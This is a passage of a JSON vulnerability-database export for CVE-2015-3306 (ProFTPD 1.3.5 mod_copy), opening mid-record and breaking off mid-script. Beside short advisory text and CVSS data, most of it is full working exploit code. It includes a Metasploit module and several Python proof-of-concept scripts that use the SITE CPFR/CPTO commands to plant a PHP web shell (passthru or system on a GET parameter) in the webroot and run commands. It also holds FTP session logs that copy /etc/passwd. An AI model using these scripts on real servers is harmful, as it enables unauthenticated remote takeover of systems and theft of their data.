`**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "saint", "title": "ProFTPD mod_copy command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-29T00:00:00", "id": "SAINT:FD1752E124A72FD3A26EEB9B315E8382", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:53", "description": "", "cvss3": {}, "published": "2015-06-10T00:00:00", "type": "packetstorm", "title": "ProFTPD 1.3.5 Mod_Copy Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-06-10T00:00:00", "id": "PACKETSTORM:132218", "href": "https://packetstormsecurity.com/files/132218/ProFTPD-1.3.5-Mod_Copy-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', \n'Description' => %q{ \nThis module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. \nAny unauthenticated client can leverage these commands to copy files from any \npart of the filesystem to a chosen destination. The copy commands are executed with \nthe rights of the ProFTPD service, which by default runs under the privileges of the \n'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website \ndirectory, PHP remote code execution is made possible. \n}, \n'Author' => \n[ \n'Vadim Melihow', # Original discovery, Proof of Concept \n'xistence <xistence[at]0x90.nl>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-3306' ], \n[ 'EDB', '36742' ] \n], \n'Privileged' => false, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'BadChars' => '', \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic gawk bash python perl' \n} \n}, \n'Targets' => \n[ \n[ 'ProFTPD 1.3.5', { } ] \n], \n'DisclosureDate' => 'Apr 22 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('RPORT', [true, 'HTTP port', 80]), \nOptPort.new('RPORT_FTP', [true, 'FTP port', 21]), \nOptString.new('TARGETURI', [true, 'Base path to the website', '/']), \nOptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), \nOptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) \n], self.class) \nend \n \ndef check \nftp_port = datastore['RPORT_FTP'] \nsock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) \n \nif sock.nil? \nfail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\") \nelse \nprint_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\") \nend \n \nres = sock.get_once(-1, 10) \nunless res && res.include?('220') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\") \nend \n \nsock.puts(\"SITE CPFR /etc/passwd\\r\\n\") \nres = sock.get_once(-1, 10) \nif res && res.include?('350') \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \nftp_port = datastore['RPORT_FTP'] \nget_arg = rand_text_alphanumeric(5+rand(3)) \npayload_name = rand_text_alphanumeric(5+rand(3)) + '.php' \n \nsock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) \n \nif sock.nil? \nfail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\") \nelse \nprint_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\") \nend \n \nres = sock.get_once(-1, 10) \nunless res && res.include?('220') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\") \nend \n \nprint_status(\"#{rhost}:#{ftp_port} - Sending copy commands to FTP server\") \n \nsock.puts(\"SITE CPFR /proc/self/cmdline\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('350') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline\") \nend \n \nsock.put(\"SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('250') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying to temporary payload file\") \nend \n \nsock.put(\"SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('350') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from temporary payload file\") \nend \n \nsock.put(\"SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('250') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?\") \nend \n \nsock.close \n \nprint_status(\"#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}\") \nres = send_request_cgi!( \n'uri' => normalize_uri(target_uri.path, payload_name), \n'method' => 'GET', \n'vars_get' => { get_arg => \"nohup #{payload.encoded} &\" } \n) \n \nunless res && res.code == 200 \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure executing payload\") \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132218/proftpd_modcopy_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:38", "description": "", "cvss3": {}, "published": "2015-04-22T00:00:00", "type": "packetstorm", "title": "ProFTPd CPFR / CPTO Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-22T00:00:00", "id": "PACKETSTORM:131567", "href": "https://packetstormsecurity.com/files/131567/ProFTPd-CPFR-CPTO-Proof-Of-Concept.html", "sourceData": "`''' \n*** for educational purpouse ONLY! *** \n \nc0ded by daldana. (daniel.aldana.moreno ___at__ gmail.com) \nplease, first read https://github.com/chcx/cpx_proftpd/ \n''' \n \n \nimport sys \nfrom ftplib import FTP \n \n \ndef main(argv): \n \n \nif len(argv) == 4: \nip = argv[1] \nsrc = argv[2] \ndst = argv[3] \noption = 1 \n \nelif len(argv) == 3: \nip = argv[1] \ndst = argv[2] \noption = 2 \n \nelse: \nprint 'please check the readme file.-' \nsys.exit(2) \n \ntry: \nftp = FTP(ip) \n \nexcept: \nprint 'connection refused.-' \nsys.exit(2) \n \n \nif option == 1: \n \nprint 'YOU ARE TRYING METHOD ONE:' \n \ncmd1 = 'SITE CPFR ' + src \ncmd2 = 'SITE CPTO ' + dst \n \n \ntry: \nres1 = ftp.sendcmd(cmd1) \nexcept: \nprint 'NO SUCH FILE :(' \nsys.exit(2) \n \n \ntry: \nres2 = ftp.sendcmd(cmd2) \nprint 'NICE! TRY NOW! :)' \n \nexcept: \nprint 'YOU DON\\'T HAVE PERMISSION :(' \nsys.exit(2) \n \n \nif option == 2: \nprint 'YOU ARE TRYING METHOD TWO:' \ncmd1 = 'SITE CPFR /proc/self/cmdline' \ncmd2 = 'SITE CPTO /tmp/...<?php passthru($_GET[\\'img\\']);?>' \ncmd3 = 'SITE CPFR /tmp/...<?php passthru($_GET[\\'img\\']);?>' \ncmd4 = 'SITE CPTO ' + dst + '/lndex.php' \nprint 'UPLOADING in ' + dst + '/lndex.php' \n \n \ntry: \nres1 = ftp.sendcmd(cmd1) \nexcept: \nprint 'NO SUCH FILE OR PERMISSION FOR CMDLINE :(' \nsys.exit(2) \n \n \ntry: \nres2 = ftp.sendcmd(cmd2) \nexcept: \nprint 'YOU DON\\'T HAVE PERMISSION :(' \nsys.exit(2) \n \ntry: \nres3 = ftp.sendcmd(cmd3) \nres4 = ftp.sendcmd(cmd4) \nprint 'NICE! TRY NOW! :)' \n \nexcept: \nprint 'PROBLEMS ;(' \n \n \n \n \n \nif __name__ == \"__main__\": \nmain(sys.argv) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/131567/cpx_proftp.py.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-05-26T18:01:57", "description": "", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "packetstorm", "title": "ProFTPd 1.3.5 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-05-26T00:00:00", "id": "PACKETSTORM:162777", "href": "https://packetstormsecurity.com/files/162777/ProFTPd-1.3.5-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) \n# Date: 25/05/2021 \n# Exploit Author: Shellbr3ak \n# Version: 1.3.5 \n# Tested on: Ubuntu 16.04.6 LTS \n# CVE : CVE-2015-3306 \n \n#!/usr/bin/env python3 \n \nimport sys \nimport socket \nimport requests \n \ndef exploit(client, target): \nclient.connect((target,21)) # Connecting to the target server \nbanner = client.recv(74) \nprint(banner.decode()) \nclient.send(b'site cpfr /etc/passwd\\r\\n') \nprint(client.recv(1024).decode()) \nclient.send(b'site cpto <?php phpinfo(); ?>\\r\\n') # phpinfo() is just a PoC. \nprint(client.recv(1024).decode()) \nclient.send(b'site cpfr /proc/self/fd/3\\r\\n') \nprint(client.recv(1024).decode()) \nclient.send(b'site cpto /var/www/html/test.php\\r\\n') \nprint(client.recv(1024).decode()) \nclient.close() \nprint('Exploit Completed') \n \ndef check(url): \nreq = requests.get(url) # Requesting the written PoC php file via HTTP \nif req.status_code == 200: \nprint('[+] File Written Successfully') \nprint(f'[+] Go to : {url}') \nelse: \nprint('[!] Something Went Wrong') \nprint('[!] Directory might not be writable') \n \ndef main(): \nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntarget = sys.argv[1] \nexploit(client, target) \nurl = 'http://' + target + '/test.php' \ncheck(url) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162777/proftpd135modcopy-exec.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-05T22:22:24", "description": "", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "packetstorm", "title": "ProFTPd 1.3.5 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-21T00:00:00", "id": "PACKETSTORM:131555", "href": "https://packetstormsecurity.com/files/131555/ProFTPd-1.3.5-Remote-Command-Execution.html", "sourceData": "`# Title: ProFTPd 1.3.5 Remote Command Execution \n# Date : 20/04/2015 \n# Author: R-73eN \n# Software: ProFTPd 1.3.5 with mod_copy \n# Tested : Kali Linux 1.06 \n# CVE : 2015-3306 \n# Greetz to Vadim Melihow for all the hard work . \nimport socket \nimport sys \nimport requests \n#Banner \nbanner = \"\" \nbanner += \" ___ __ ____ _ _ \\n\" \nbanner +=\" |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \\n\" \nbanner +=\" | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \\n\" \nbanner +=\" | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \\n\" \nbanner +=\" |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\\n\\n\" \nprint banner \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nif(len(sys.argv) < 4): \nprint '\\n Usage : exploit.py server directory cmd' \nelse: \nserver = sys.argv[1] #Vulnerable Server \ndirectory = sys.argv[2] # Path accessible from web ..... \ncmd = sys.argv[3] #PHP payload to be executed \nevil = '<?php system(\"' + cmd + '\") ?>' \ns.connect((server, 21)) \ns.recv(1024) \nprint '[ + ] Connected to server [ + ] \\n' \ns.send('site cpfr /etc/passwd') \ns.recv(1024) \ns.send('site cpto ' + evil) \ns.recv(1024) \ns.send('site cpfr /proc/self/fd/3') \ns.recv(1024) \ns.send('site cpto ' + directory + 'infogen.php') \ns.recv(1024) \ns.close() \nprint '[ + ] Payload sended [ + ]\\n' \nprint '[ + ] Executing Payload [ + ]\\n' \nr = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP \nif (r.status_code == 200): \nprint '[ * ] Payload Executed Succesfully [ * ]' \nelse: \nprint ' [ - ] Error : ' + str(r.status_code) + ' [ - ]' \n \nprint '\\n http://infogen.al/' \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/131555/proftpd135-exec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:18:08", "description": "", "cvss3": {}, "published": "2015-04-18T00:00:00", "type": "packetstorm", "title": "ProFTPd 1.3.5 File Copy", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-18T00:00:00", "id": "PACKETSTORM:131505", "href": "https://packetstormsecurity.com/files/131505/ProFTPd-1.3.5-File-Copy.html", "sourceData": "`Description TJ Saunders 2015-04-07 16:35:03 UTC \nVadim Melihow reported a critical issue with proftpd installations that use the \nmod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands \nto be used by *unauthenticated clients*: \n \n--------------------------------- \nTrying 80.150.216.115... \nConnected to 80.150.216.115. \nEscape character is '^]'. \n220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115] \nsite help \n214-The following SITE commands are recognized (* =>'s unimplemented) \n214-CPFR <sp> pathname \n214-CPTO <sp> pathname \n214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path \n214-SYMLINK <sp> source <sp> destination \n214-RMDIR <sp> path \n214-MKDIR <sp> path \n214-The following SITE extensions are recognized: \n214-RATIO -- show all ratios in effect \n214-QUOTA \n214-HELP \n214-CHGRP \n214-CHMOD \n214 Direct comments to root@www01a \nsite cpfr /etc/passwd \n350 File or directory exists, ready for destination name \nsite cpto /tmp/passwd.copy \n250 Copy successful \n----------------------------------------- \n \nHe provides another, scarier example: \n \n------------------------------ \nsite cpfr /etc/passwd \n350 File or directory exists, ready for destination name \nsite cpto <?php phpinfo(); ?> \n550 cpto: Permission denied \nsite cpfr /proc/self/fd/3 \n350 File or directory exists, ready for destination name \nsite cpto /var/www/test.php \n \ntest.php now contains \n---------------------- \n2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q \n(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument \n2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q \n(slon-P5Q.lan[192.168.3.193]): FTP session opened. \n2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q \n(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php \nphpinfo(); ?>' for copying: Permission denied \n----------------------- \n \ntest.php contains contain correct php script \"<?php phpinfo(); ?>\" which \ncan be run by the php interpreter \n \nSource: http://bugs.proftpd.org/show_bug.cgi?id=4169 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/131505/proftpd135-filecopy.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:13", "edition": 3, "description": "**Name**| proftpd_mod_copy \n---|--- \n**CVE**| CVE-2015-3306 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ProFTPd 1.3.5 Remote File Copy \n**Notes**| CVE Name: CVE-2015-3306 \nVENDOR: \nNOTES: \n \nThis exploit abuses the commands of the mod_copy module in ProFTPd (version<=1.3.5). The SITE CPFR/CPTO commands can be used by unauthenticated clients to copy files from any part of the filesistem to a chosen destination. With these commands the mod_copy module allows remote attackers to read and write local files. \nIn the first part of the attack, the exploit copy the /proc/self/cmdline to /tmp/ folder with a PHP payload as the filename, then copy this file to the webroot as a PHP file. \nThe second part of the attack involves making a GET request to the PHP file just created with the PHP shellcode as a parameter. The payload created in the first part will execute the PHP \nshellcode \n \nNote about the target: \nTo exploit this vulnerability, the mod_copy module must be compiled with the ProFTPd's sources.Also we need write privs on the webroot folder we choose (unless the ftp server was started has root). \nThen we must assume that the webserver has a PHP module. \n \n \nThis exploit has been tested on: \n* Ubuntu 13.04 - Linux 3.8.0-19-generic x64. (Successful exploitation) \n \n \nCommand line usage: \n$ ./commandlineInterface.py -l 172.16.135.238 -p5556 -v 7 \n$ python ./exploits/remote/unix/proftpd_mod_copy/proftpd_mod_copy.py -t 172.16.135.238 -l 172.16.135.1 -d 5556 \n \n \nRepeatability: Infinite \nReferences: http://bugs.proftpd.org/show_bug.cgi?id=4169 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306 \nCERT Advisory: None \nDate Public: 05/18/2015 \nCVSS: 10 \n\n", "cvss3": {}, "published": "2015-05-18T15:59:00", "type": "canvas", "title": "Immunity Canvas: PROFTPD_MOD_COPY", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-18T15:59:00", "id": "PROFTPD_MOD_COPY", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2022-06-06T16:49:30", "description": "", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "zdt", "title": "ProFTPd 1.3.5 - (mod_copy) Remote Command Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2021-05-26T00:00:00", "id": "1337DAY-ID-36298", "href": "https://0day.today/exploit/description/36298", "sourceData": "# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)\n# Exploit Author: Shellbr3ak\n# Version: 1.3.5 \n# Tested on: Ubuntu 16.04.6 LTS\n# CVE : CVE-2015-3306\n\n#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport requests\n\ndef exploit(client, target):\n client.connect((target,21)) # Connecting to the target server\n banner = client.recv(74)\n print(banner.decode())\n client.send(b'site cpfr /etc/passwd\\r\\n')\n print(client.recv(1024).decode())\n client.send(b'site cpto <?php phpinfo(); ?>\\r\\n') # phpinfo() is just a PoC.\n print(client.recv(1024).decode())\n client.send(b'site cpfr /proc/self/fd/3\\r\\n')\n print(client.recv(1024).decode())\n client.send(b'site cpto /var/www/html/test.php\\r\\n')\n print(client.recv(1024).decode())\n client.close()\n print('Exploit Completed')\n\ndef check(url):\n req = requests.get(url) # Requesting the written PoC php file via HTTP\n if req.status_code == 200:\n print('[+] File Written Successfully')\n print(f'[+] Go to : {url}')\n else:\n print('[!] Something Went Wrong')\n print('[!] Directory might not be writable')\n\ndef main():\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n target = sys.argv[1]\n exploit(client, target)\n url = 'http://' + target + '/test.php'\n check(url)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36298", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-09T23:21:26", "description": "This Metasploit module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.", "cvss3": {}, "published": "2015-06-10T00:00:00", "type": "zdt", "title": "ProFTPD 1.3.5 Mod_Copy Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-06-10T00:00:00", "id": "1337DAY-ID-23720", "href": "https://0day.today/exploit/description/23720", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution',\r\n 'Description' => %q{\r\n This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.\r\n Any unauthenticated client can leverage these commands to copy files from any\r\n part of the filesystem to a chosen destination. The copy commands are executed with\r\n the rights of the ProFTPD service, which by default runs under the privileges of the\r\n 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website\r\n directory, PHP remote code execution is made possible.\r\n },\r\n 'Author' =>\r\n [\r\n 'Vadim Melihow', # Original discovery, Proof of Concept\r\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-3306' ],\r\n [ 'EDB', '36742' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'unix' ],\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'BadChars' => '',\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic gawk bash python perl'\r\n }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'ProFTPD 1.3.5', { } ]\r\n ],\r\n 'DisclosureDate' => 'Apr 22 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptPort.new('RPORT', [true, 'HTTP port', 80]),\r\n OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),\r\n OptString.new('TARGETURI', [true, 'Base path to the website', '/']),\r\n OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),\r\n OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n ftp_port = datastore['RPORT_FTP']\r\n sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)\r\n\r\n if sock.nil?\r\n fail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\")\r\n else\r\n print_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\")\r\n end\r\n\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('220')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\")\r\n end\r\n\r\n sock.puts(\"SITE CPFR /etc/passwd\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n if res && res.include?('350')\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n ftp_port = datastore['RPORT_FTP']\r\n get_arg = rand_text_alphanumeric(5+rand(3))\r\n payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'\r\n\r\n sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)\r\n\r\n if sock.nil?\r\n fail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\")\r\n else\r\n print_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\")\r\n end\r\n\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('220')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{ftp_port} - Sending copy commands to FTP server\")\r\n\r\n sock.puts(\"SITE CPFR /proc/self/cmdline\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('350')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline\")\r\n end\r\n\r\n sock.put(\"SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('250')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying to temporary payload file\")\r\n end\r\n\r\n sock.put(\"SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('350')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from temporary payload file\")\r\n end\r\n\r\n sock.put(\"SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('250')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?\")\r\n end\r\n\r\n sock.close\r\n\r\n print_status(\"#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}\")\r\n res = send_request_cgi!(\r\n 'uri' => normalize_uri(target_uri.path, payload_name),\r\n 'method' => 'GET',\r\n 'vars_get' => { get_arg => \"nohup #{payload.encoded} &\" }\r\n )\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure executing payload\")\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/23720", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T09:05:19", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "zdt", "title": "ProFTPd 1.3.5 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-21T00:00:00", "id": "1337DAY-ID-23544", "href": "https://0day.today/exploit/description/23544", "sourceData": "# Title: ProFTPd 1.3.5 Remote Command Execution\r\n# Date : 20/04/2015\r\n# Author: R-73eN\r\n# Software: ProFTPd 1.3.5 with mod_copy\r\n# Tested : Kali Linux 1.06\r\n# CVE : 2015-3306\r\n# Greetz to Vadim Melihow for all the hard work .\r\nimport socket\r\nimport sys\r\nimport requests\r\n#Banner\r\nbanner = \"\"\r\nbanner += \" ___ __ ____ _ _ \\n\" \r\nbanner +=\" |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \\n\"\r\nbanner +=\" | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \\n\"\r\nbanner +=\" | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \\n\"\r\nbanner +=\" |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\\n\\n\"\r\nprint banner\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nif(len(sys.argv) < 4):\r\n print '\\n Usage : exploit.py server directory cmd'\r\nelse:\r\n server = sys.argv[1] #Vulnerable Server\r\n directory = sys.argv[2] # Path accessible from web .....\r\n cmd = sys.argv[3] #PHP payload to be executed\r\n 